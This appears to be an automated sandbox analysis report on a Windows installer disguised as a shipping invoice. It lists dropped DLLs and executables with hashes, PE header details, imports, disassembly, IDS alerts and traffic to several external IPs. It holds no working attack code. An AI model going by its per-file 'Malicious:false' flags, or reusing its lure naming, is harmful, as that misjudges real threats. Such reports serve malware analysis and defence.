                                                                                                                                  Preview: .i......,.......,........#......X]......uh.......i......................................................*.......................................................................................................................................................................................................j.......................3...............................................................................................................*...............3...............................................................3.......................................g...............................................................j...............................................................................................................................f.......................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\special_offers\dirb\123\dbsvcui.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):16896
                                                                                                                                  Entropy (8bit):3.838968174263835
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:7YndHVTZZip3YBq2nieYqHAAUsJ3M3IDLbKDnbNWcuTWN:EdHVnG38DieFHcsJcYDL2DnpWbTW
                                                                                                                                  MD5:585AC8F0CA13C1326C5E562B509B8E2D
                                                                                                                                  SHA1:B884490E95CEBA559E50E48F22E810D9E5925792
                                                                                                                                  SHA-256:5551259AE036773BB93168503FE1BA75EA2E5718C02172FDCAE6E20B4B80CA25
                                                                                                                                  SHA-512:88E734E475D3A6A721E18B9FB1E80231CA81509C6B20B9927DDE5A1F16D69FE118C56A1EDC655E492D6388037AE748E39D9A3FE8E4F957BC83703F18A2E5E237
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-T.L:..L:..L:...F..L:...B..L:.Rich.L:.........PE..L.....3C...........!.........>....................F[.........................p.......I............................................... ..$9...................`.......................................................................................text...p...........................@..@.rsrc...$9... ...:..................@..@.reloc.......`.......@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\special_offers\dirb\123\number.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):134
                                                                                                                                  Entropy (8bit):4.544675981202402
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:vFWWMNCmVijhGOjaESwJFBngKbWJkZGWGOjaESydZMqgKbWJRqT:TM3VijhGif0KykZGWGiJuTKyET
                                                                                                                                  MD5:A75CA31F7ED72AF18B51615986EDA289
                                                                                                                                  SHA1:59CD60370C065551CC3B3EFEF5901B76DE930771
                                                                                                                                  SHA-256:4C2CE6779620133C87EC716FA06DA2A3A9EA97862AC0B7AC1051B474573EE93E
                                                                                                                                  SHA-512:3BE3A461AFE5B0527719A1F1103BD0CB836C8F4340DB5192C99BF0121C9F3D3F9ECB0127E6C82F1FF830E297AF54199706671053CC6BE4CC91C29F6180C96010
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version='1.0'?>..<data>...<circle>....<radius>12</radius>...</circle>...<circle>....<radius>37.5</radius>...</circle>..</data>
                                                                                                                                  C:\Users\user\AppData\Roaming\panel\box\xbox\67.opends60.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):47
                                                                                                                                  Entropy (8bit):3.9953502875256306
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:p/uBallM/lErm1F:RcasDP
                                                                                                                                  MD5:E4E4F671BDE80749EA2EB465FDA2568D
                                                                                                                                  SHA1:5CA98566B46E8BC5538399CB05F85A8F41DDE61F
                                                                                                                                  SHA-256:82F834504F7C6FCE706E28083E8A93F52A61A84918B0CDCBDC0B1A70B505B1D1
                                                                                                                                  SHA-512:61E8CED4EE21CED48F0D4FBCCE3CCC35546DBAFB6B6C63A73503205740830BA11452E44A668AEE123F72A1C75499B5F9A270E85B56BF782EA79A4D695EEDAA08
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: ......L....9....)..._srv_senddone.opends60.dll.
                                                                                                                                  C:\Users\user\AppData\Roaming\panel\box\xbox\msvsotbcct.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):6144
                                                                                                                                  Entropy (8bit):4.623117599850433
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:K1DJcZB62DHzW6st3+K9XEWCPCNjaqNyyWPV:K1dIH1sD6WCKNjaMyyWN
                                                                                                                                  MD5:743B7D073C1BFB883B9F97CA1D5DDF94
                                                                                                                                  SHA1:01AFEC884E6B5D1CA5ECCB47E18C52CFF44882FA
                                                                                                                                  SHA-256:1A0E9EC2FD53F7D0CE83BF4745D44681412724250046F0A88C54A630EE5A9A59
                                                                                                                                  SHA-512:5947FC4DC66F476289EECA57E7D2CB0766528602DA8C124C62A544ACC4DDD38944B15ECFE9651A74764379797A5B782975DC7949EC37A3C6E6757E5477502979
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-T.L:..L:..L:...F..L:..L:..L:...B..L:.Rich.L:.........PE..L...P.3C...........!.........................................................@.......b.......................................................................0.......................................................................................rsrc...............................@..@.reloc.......0......................@..B................H...(.......@.......h...................................................X...................................................................................................................................(.......................8...`...V...............h........... ...(...........H...*...........x.................C.T.M.E.N.U...........CFCT............r...T........,?.2...cvw.y............................h..y..w........wxw.w.y..ww.........................................
                                                                                                                                  C:\Users\user\AppData\Roaming\pkgs\rcxditui.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):5120
                                                                                                                                  Entropy (8bit):3.152590437417521
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:KqiJ6OqhgmLwQpXMbqwcI65y7+OiaC+IZWo6zqhpm3F5WPWghnpgX:jOqhiZF6zSEWEOjWPVn0
                                                                                                                                  MD5:CC869C04E8771D08397DC86374FE5A5E
                                                                                                                                  SHA1:D7CD17B9607538DCDD6FC267EE504B37740992FF
                                                                                                                                  SHA-256:420007C3E0A76AC880679F323653D3B9321832F578CA4DC1C2A1E5775A0F77DD
                                                                                                                                  SHA-512:684114317AB54248D20727058F58E592CFFEE865E876B8155C4426EE71CF15BFACAEE07E2C9EF49C8D3F99CF6F0E20AE8800D2DF88F0550E5304AB39BA468EF4
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-T.L:..L:..L:...F..L:...B..L:.Rich.L:.........PE..L...K.3C...........!...............................[.........................@......G................................................ .......................0.......................................................................................text...q...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Roaming\pkgs\vjscsvr.exe
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):46784
                                                                                                                                  Entropy (8bit):6.38572528005874
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:iiLuedE09FC5Ja5gR/2hyzsiPKxUd+0PpOmMKbfZD8L3d/o+/j:iiLu+LsjPR/2AzsiP3+KOmdbfZD8R/ou
                                                                                                                                  MD5:2483FFB732EFA8A92F6A78B4E97C07EA
                                                                                                                                  SHA1:4929D6076B400EB8C92D941E7C2898FEF282094D
                                                                                                                                  SHA-256:8713626CFB6493E4905448C96BEA3F77C0A05876208B3F87BF95D13166D53A70
                                                                                                                                  SHA-512:F71E5DBB2F985DCD7A0CB1C14D602A05964F15D6E32A859FA48710EB34AF9540448A86E27AD0E0BF3136465C6C142BCC473F74C215B248F07E8C641AF168FDE2
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q.y...*...*...*...*...*...*...*...*...*...*...*G..*...*...*...*...*...*...*...*...*...*...*...*...*...*...*...*Rich...*........PE..L.....3C.................v..."......df............@.............................................. ...........................z......................................@...............................@...@............................................text....u.......v.................. ..`.data...,............z..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Roaming\pkgs\x-lz4.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1953
                                                                                                                                  Entropy (8bit):5.19612754901248
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cFQHd6hH3nRBS46jdeBOfGguEeB5NCgZ2clMfeBtIQxq3vQjS/LMSkPYF:e13nRBSDheBOfGguEeBPCgZ2clMWBtIP
                                                                                                                                  MD5:D36051864C2DB5D4112463629F26A091
                                                                                                                                  SHA1:24BF1CC82EBBCCFEE903A0F11E45D40D8F93BF0E
                                                                                                                                  SHA-256:E0B10A6875F8FAB58C1E9C58900CB5363DD7ABFC5921C9FBC67D5A12212E7B5F
                                                                                                                                  SHA-512:0F21BEA6ED7EA348E295FD551400F1928407C635077B7457C02B089D0C6B215DE818BFE2D7A5796DB82512EF8F4A91B053A60303A6737FC3872ACE861D8F83C3
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>.<mime-type xmlns="http://www.freedesktop.org/standards/shared-mime-info" type="application/x-lz4">. Created automatically by update-mime-database. DO NOT EDIT!-->. <comment>LZ4 archive</comment>. <comment xml:lang="ca">arxiu LZ4</comment>. <comment xml:lang="cs">archiv LZ4</comment>. <comment xml:lang="da">LZ4-arkiv</comment>. <comment xml:lang="de">LZ4-Archiv</comment>. <comment xml:lang="el">........... ...... LZ4</comment>. <comment xml:lang="en_GB">LZ4 archive</comment>. <comment xml:lang="es">archivador LZ4</comment>. <comment xml:lang="eu">LZ4 artxiboa</comment>. <comment xml:lang="fi">LZ4-arkisto</comment>. <comment xml:lang="fr">archive LZ4</comment>. <comment xml:lang="ga">Cartlann LZ4</comment>. <comment xml:lang="gl">Arquivo LZ4</comment>. <comment xml:lang="he">...... LZ4</comment>. <comment xml:lang="hr">LZ4 arhiva</comment>. <comment xml:lang="hu">LZ4 arch.vum</comment>. <comment xml:lang

                                                                                                                                  Static File Info

                                                                                                                                  General

                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                  Entropy (8bit):7.87849220099009
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File size:438107
                                                                                                                                  MD5:579ba39b6a146080ef6481591440e445
                                                                                                                                  SHA1:06bfc3b47e1ad6a35e10cb4a1edee6c563710107
                                                                                                                                  SHA256:d8d9bb65ea3637fda09488baada0c9b387e0619b7c430b93c8a0fa2d8b489bc1
                                                                                                                                  SHA512:bc2c920da35971ea6a6dfa8fc4f49829d6ba1eeae9589207b1f77a6e5f66d66dcb87396aadce266a61652f6fdfbe40503b9183af5f5ce26fa6cc9218df1597b9
                                                                                                                                  SSDEEP:12288:GanGnRPRnPSuPSw4YxX/Jva/qw0kLvDBZNC1J:8PhS7T8v+kW2J
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L......].................f...|.......3............@

                                                                                                                                  File Icon

                                                                                                                                  Icon Hash:90c8e472b85c261a

                                                                                                                                  Static PE Info

                                                                                                                                  General

                                                                                                                                  Entrypoint:0x4033a9
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                  Time Stamp:0x5DF6D4F7 [Mon Dec 16 00:51:03 2019 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:4
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:4
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:4
                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:7c2c71dfce9a27650634dc8b1ca03bf0

                                                                                                                                  Entrypoint Preview

                                                                                                                                  Instruction
                                                                                                                                  sub esp, 00000184h
                                                                                                                                  push ebx
                                                                                                                                  push esi
                                                                                                                                  push edi
                                                                                                                                  xor ebx, ebx
                                                                                                                                  push 00008001h
                                                                                                                                  mov dword ptr [esp+18h], ebx
                                                                                                                                  mov dword ptr [esp+10h], 0040A130h
                                                                                                                                  mov dword ptr [esp+20h], ebx
                                                                                                                                  mov byte ptr [esp+14h], 00000020h
                                                                                                                                  call dword ptr [004080A8h]
                                                                                                                                  call dword ptr [004080A4h]
                                                                                                                                  and eax, BFFFFFFFh
                                                                                                                                  cmp ax, 00000006h
                                                                                                                                  mov dword ptr [0042F42Ch], eax
                                                                                                                                  je 00007F43E0572AA3h
                                                                                                                                  push ebx
                                                                                                                                  call 00007F43E0575BA3h
                                                                                                                                  cmp eax, ebx
                                                                                                                                  je 00007F43E0572A99h
                                                                                                                                  push 00000C00h
                                                                                                                                  call eax
                                                                                                                                  mov esi, 00408298h
                                                                                                                                  push esi
                                                                                                                                  call 00007F43E0575B1Fh
                                                                                                                                  push esi
                                                                                                                                  call dword ptr [004080A0h]
                                                                                                                                  lea esi, dword ptr [esi+eax+01h]
                                                                                                                                  cmp byte ptr [esi], bl
                                                                                                                                  jne 00007F43E0572A7Dh
                                                                                                                                  push 0000000Ah
                                                                                                                                  call 00007F43E0575B77h
                                                                                                                                  push 00000008h
                                                                                                                                  call 00007F43E0575B70h
                                                                                                                                  push 00000006h
                                                                                                                                  mov dword ptr [0042F424h], eax
                                                                                                                                  call 00007F43E0575B64h
                                                                                                                                  cmp eax, ebx
                                                                                                                                  je 00007F43E0572AA1h
                                                                                                                                  push 0000001Eh
                                                                                                                                  call eax
                                                                                                                                  test eax, eax
                                                                                                                                  je 00007F43E0572A99h
                                                                                                                                  or byte ptr [0042F42Fh], 00000040h
                                                                                                                                  push ebp
                                                                                                                                  call dword ptr [00408040h]
                                                                                                                                  push ebx
                                                                                                                                  call dword ptr [00408284h]
                                                                                                                                  mov dword ptr [0042F4F8h], eax
                                                                                                                                  push ebx
                                                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                                                  push 00000160h
                                                                                                                                  push eax
                                                                                                                                  push ebx
                                                                                                                                  push 00429858h
                                                                                                                                  call dword ptr [00408178h]
                                                                                                                                  push 0040A1ECh

                                                                                                                                  Rich Headers

                                                                                                                                  Programming Language:
                                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                  Data Directories

                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x853c0xa0.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3f0000x4340.rsrc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x294.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                  Sections

                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                  .text0x10000x64550x6600False0.667356004902data6.43794179006IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                  .rdata0x80000x134a0x1400False0.459765625data5.23641914595IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .data0xa0000x255380x600False0.461588541667data4.12893654735IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                  .ndata0x300000xf0000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .rsrc0x3f0000x43400x4400False0.12890625data2.33445296823IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                  Resources

                                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                                  RT_ICON0x3f3100x10a8dataEnglishUnited States
                                                                                                                                  RT_ICON0x403b80xea8GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                  RT_ICON0x412600x8a8dataEnglishUnited States
                                                                                                                                  RT_ICON0x41b080x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                  RT_ICON0x420700x468dataEnglishUnited States
                                                                                                                                  RT_ICON0x424d80x2e8dataEnglishUnited States
                                                                                                                                  RT_ICON0x427c00x128dataEnglishUnited States
                                                                                                                                  RT_DIALOG0x428e80xb4dataEnglishUnited States
                                                                                                                                  RT_DIALOG0x429a00x120dataEnglishUnited States
                                                                                                                                  RT_DIALOG0x42ac00x202dataEnglishUnited States
                                                                                                                                  RT_DIALOG0x42cc80xf8dataEnglishUnited States
                                                                                                                                  RT_DIALOG0x42dc00xeedataEnglishUnited States
                                                                                                                                  RT_GROUP_ICON0x42eb00x68dataEnglishUnited States
                                                                                                                                  RT_MANIFEST0x42f180x423XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                                  Imports

                                                                                                                                  DLLImport
                                                                                                                                  KERNEL32.dllSetEnvironmentVariableA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, Sleep, GetTickCount, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, SetFileAttributesA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileTime, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CloseHandle, lstrcmpiA, GlobalUnlock, GetDiskFreeSpaceA, lstrcmpA, DeleteFileA, FindFirstFileA, FindNextFileA, FindClose, SetFilePointer, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, MultiByteToWideChar, FreeLibrary, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
                                                                                                                                  USER32.dllGetSystemMenu, SetClassLongA, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, LoadImageA, CreateDialogParamA, SetTimer, SetWindowTextA, SetForegroundWindow, ShowWindow, SetWindowLongA, SendMessageTimeoutA, FindWindowExA, IsWindow, AppendMenuA, TrackPopupMenu, CreatePopupMenu, DrawTextA, EndPaint, DestroyWindow, wsprintfA, PostQuitMessage
                                                                                                                                  GDI32.dllSelectObject, SetTextColor, SetBkMode, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, GetDeviceCaps, SetBkColor
                                                                                                                                  SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
                                                                                                                                  ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                                                  COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                  ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                                                  Possible Origin

                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                  EnglishUnited States

                                                                                                                                  Network Behavior

                                                                                                                                  Snort IDS Alerts

                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                  11/26/20-15:08:39.139293TCP1201ATTACK-RESPONSES 403 Forbidden804976634.102.136.180192.168.2.4
                                                                                                                                  11/26/20-15:08:44.471838TCP1201ATTACK-RESPONSES 403 Forbidden804976734.102.136.180192.168.2.4
                                                                                                                                  11/26/20-15:08:55.246997TCP1201ATTACK-RESPONSES 403 Forbidden804976975.126.100.11192.168.2.4
                                                                                                                                  11/26/20-15:09:05.767720TCP1201ATTACK-RESPONSES 403 Forbidden804977134.102.136.180192.168.2.4

                                                                                                                                  Network Port Distribution

                                                                                                                                  TCP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Nov 26, 2020 15:08:23.735517979 CET4976480192.168.2.4192.0.78.24
                                                                                                                                  Nov 26, 2020 15:08:23.752428055 CET8049764192.0.78.24192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:23.752602100 CET4976480192.168.2.4192.0.78.24
                                                                                                                                  Nov 26, 2020 15:08:23.752765894 CET4976480192.168.2.4192.0.78.24
                                                                                                                                  Nov 26, 2020 15:08:23.768997908 CET8049764192.0.78.24192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:23.769018888 CET8049764192.0.78.24192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:23.769026995 CET8049764192.0.78.24192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:23.769195080 CET4976480192.168.2.4192.0.78.24
                                                                                                                                  Nov 26, 2020 15:08:23.769305944 CET4976480192.168.2.4192.0.78.24
                                                                                                                                  Nov 26, 2020 15:08:23.787704945 CET8049764192.0.78.24192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:28.827683926 CET4976580192.168.2.4192.0.78.24
                                                                                                                                  Nov 26, 2020 15:08:28.844005108 CET8049765192.0.78.24192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:28.844106913 CET4976580192.168.2.4192.0.78.24
                                                                                                                                  Nov 26, 2020 15:08:28.844275951 CET4976580192.168.2.4192.0.78.24
                                                                                                                                  Nov 26, 2020 15:08:28.860564947 CET8049765192.0.78.24192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:28.860582113 CET8049765192.0.78.24192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:28.860589981 CET8049765192.0.78.24192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:28.860757113 CET4976580192.168.2.4192.0.78.24
                                                                                                                                  Nov 26, 2020 15:08:28.860820055 CET4976580192.168.2.4192.0.78.24
                                                                                                                                  Nov 26, 2020 15:08:28.877034903 CET8049765192.0.78.24192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:39.007757902 CET4976680192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:08:39.023983002 CET804976634.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:39.024090052 CET4976680192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:08:39.024245024 CET4976680192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:08:39.040355921 CET804976634.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:39.139292955 CET804976634.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:39.139324903 CET804976634.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:39.139566898 CET4976680192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:08:39.139718056 CET4976680192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:08:39.155819893 CET804976634.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:44.339562893 CET4976780192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:08:44.356126070 CET804976734.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:44.356231928 CET4976780192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:08:44.356384993 CET4976780192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:08:44.372896910 CET804976734.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:44.471837997 CET804976734.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:44.471859932 CET804976734.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:44.472093105 CET4976780192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:08:44.472237110 CET4976780192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:08:44.488727093 CET804976734.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:49.534532070 CET4976880192.168.2.423.88.85.105
                                                                                                                                  Nov 26, 2020 15:08:49.701931953 CET804976823.88.85.105192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:49.702104092 CET4976880192.168.2.423.88.85.105
                                                                                                                                  Nov 26, 2020 15:08:49.702579021 CET4976880192.168.2.423.88.85.105
                                                                                                                                  Nov 26, 2020 15:08:49.871308088 CET804976823.88.85.105192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:49.871728897 CET4976880192.168.2.423.88.85.105
                                                                                                                                  Nov 26, 2020 15:08:49.871788025 CET4976880192.168.2.423.88.85.105
                                                                                                                                  Nov 26, 2020 15:08:50.039123058 CET804976823.88.85.105192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:54.974551916 CET4976980192.168.2.475.126.100.11
                                                                                                                                  Nov 26, 2020 15:08:55.110631943 CET804976975.126.100.11192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:55.110913992 CET4976980192.168.2.475.126.100.11
                                                                                                                                  Nov 26, 2020 15:08:55.111057997 CET4976980192.168.2.475.126.100.11
                                                                                                                                  Nov 26, 2020 15:08:55.246968985 CET804976975.126.100.11192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:55.246997118 CET804976975.126.100.11192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:55.247005939 CET804976975.126.100.11192.168.2.4
                                                                                                                                  Nov 26, 2020 15:08:55.247483969 CET4976980192.168.2.475.126.100.11
                                                                                                                                  Nov 26, 2020 15:08:55.383516073 CET804976975.126.100.11192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:00.310724974 CET4977080192.168.2.495.215.210.10
                                                                                                                                  Nov 26, 2020 15:09:00.427397013 CET804977095.215.210.10192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:00.427512884 CET4977080192.168.2.495.215.210.10
                                                                                                                                  Nov 26, 2020 15:09:00.427666903 CET4977080192.168.2.495.215.210.10
                                                                                                                                  Nov 26, 2020 15:09:00.543589115 CET804977095.215.210.10192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:00.543806076 CET804977095.215.210.10192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:00.543859005 CET804977095.215.210.10192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:00.543992996 CET4977080192.168.2.495.215.210.10
                                                                                                                                  Nov 26, 2020 15:09:00.544039965 CET4977080192.168.2.495.215.210.10
                                                                                                                                  Nov 26, 2020 15:09:00.659297943 CET804977095.215.210.10192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:05.636172056 CET4977180192.168.2.434.102.136.180
